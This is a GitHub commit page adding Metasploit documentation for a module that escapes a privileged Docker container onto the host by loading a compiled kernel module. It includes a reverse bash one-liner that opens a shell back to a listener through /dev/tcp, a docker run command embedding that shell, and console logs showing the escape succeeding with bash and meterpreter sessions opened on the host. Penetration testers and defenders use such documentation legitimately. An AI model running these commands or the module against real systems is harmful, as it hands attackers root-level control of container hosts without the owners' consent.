-
Notifications
You must be signed in to change notification settings - Fork 13.8k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #18519, Docker kernel module escape
- Loading branch information
Showing
4 changed files
with
749 additions
and
429 deletions.
There are no files selected for viewing
110 changes: 110 additions & 0 deletions
110
...tation/modules/exploit/linux/local/docker_privileged_container_kernel_escape.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,110 @@ | ||
## Vulnerable Application | ||
|
||
This module performs a container escape onto the host as the daemon user. It | ||
takes advantage of the SYS_MODULE capability. If that exists and the linux | ||
headers are available to compile on the target, then we can escape onto the host. | ||
|
||
### Creating A Testing Environment | ||
|
||
- Get a VM that you want to test on (or your own machine) | ||
- Install Docker | ||
- Run a listener (can be anything but this example will make use of the msfconsole `cmd/unix/reverse_bash` payload) | ||
```msf | ||
msf6 > use payload/cmd/unix/reverse_bash | ||
msf6 payload(cmd/unix/reverse_bash) > set lhost vboxnet0 | ||
lhost => 192.168.56.1 | ||
msf6 payload(cmd/unix/reverse_bash) > generate -f raw | ||
bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118' | ||
msf6 payload(cmd/unix/reverse_bash) > exploit -z | ||
[*] Payload Handler Started as Job 0 | ||
msf6 payload(cmd/unix/reverse_bash) > | ||
[*] [2023.11.07-21:28:57] Started reverse TCP handler on 192.168.56.1:4444 | ||
``` | ||
- Create a privileged container (forwarding port 4444 in this example in order | ||
to use a bind shell from the host. Container must be the same OS as host) | ||
```bash | ||
docker run --rm -it --cap-add SYS_MODULE ubuntu bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118' | ||
``` | ||
- Inside your session, install the required packages to run. Package manager will differ to OS, for debian as an example | ||
```bash | ||
apt update && apt install -y gcc make kmod linux-headers-$(uname -r) | ||
``` | ||
|
||
## Verification Steps | ||
|
||
1. Start msfconsole | ||
2. Get a session | ||
3. Install required packages into session (line 30) | ||
4. Run `use exploit/linux/local/docker_privileged_container_kernel_escape` | ||
5. Run `set SESSION [session]` | ||
6. Run `check` | ||
7. Run `set PAYLOAD [payload]` | ||
8. Run `exploit` | ||
|
||
## Options | ||
|
||
### KernelModuleName | ||
|
||
The name that the kernel module will be called in the system. The default if no | ||
name is set is "{rand(8)}" | ||
|
||
### WritableContainerDir | ||
|
||
A directory where we can write files inside the container (default is `/tmp/.{rand(4)}`). | ||
This is needed to drop the payload into the container. | ||
|
||
### ReloadKernelModule | ||
|
||
Rebuilds and reloads kernel module if its already loaded in case of repeat runs. | ||
|
||
## Scenarios | ||
|
||
### Container Escape from debian linux with reverse bash | ||
|
||
```msf | ||
msf6 > sessions -i 1 -c "apt update && apt install -y gcc make kmod linux-headers-$(uname -r)" | ||
[*] Running 'apt update && apt install -y gcc make kmod linux-headers-$(uname -r)' on shell session 1 (192.168.56.126) | ||
msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape | ||
[*] Using configured payload cmd/unix/reverse_bash | ||
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 1 | ||
session => 1 | ||
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check | ||
[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable | ||
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z | ||
[*] [2023.11.07-21:42:40] Started reverse TCP handler on 192.168.56.1:4444 | ||
[*] [2023.11.07-21:42:42] Creating files... | ||
[*] [2023.11.07-21:42:43] Compiling the kernel module... | ||
[+] [2023.11.07-21:42:43] Kernel module compiled successfully | ||
[*] [2023.11.07-21:42:43] Loading kernel module... | ||
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.126:60974) at 2023-11-07 21:42:50 -0500 | ||
[*] This is CredCollect, I have the conn! | ||
``` | ||
|
||
### Container Escape from arch linux with meterpreter | ||
|
||
```msf | ||
msf6 > sessions -i 2 -c "pacman -Syy --noconfirm gcc glibc make linux-headers" | ||
[*] Running 'pacman -Syy --noconfirm gcc glibc make linux-headers' on shell session 2 (192.168.56.106) | ||
msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape | ||
[*] Using configured payload cmd/unix/reverse_bash | ||
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 2 | ||
session => 2 | ||
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp | ||
payload => cmd/linux/http/x64/meterpreter/reverse_tcp | ||
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set lhost vboxnet0 | ||
lhost => vboxnet0 | ||
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check | ||
[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable | ||
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z | ||
[*] [2023.11.07-21:48:40] Started reverse TCP handler on 192.168.56.1:4444 | ||
[*] [2023.11.07-21:48:41] Creating files... | ||
[*] [2023.11.07-21:48:43] Compiling the kernel module... | ||
[+] [2023.11.07-21:48:44] Kernel module compiled successfully | ||
[*] [2023.11.07-21:48:44] Loading kernel module... | ||
[*] [2023.11.07-21:48:44] Sending stage (3045380 bytes) to 192.168.56.106 | ||
[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.106:50402) at 2023-11-07 21:48:45 -0500 | ||
[*] This is CredCollect, I have the conn! | ||
[*] Session 4 created in the background. | ||
``` |
Oops, something went wrong.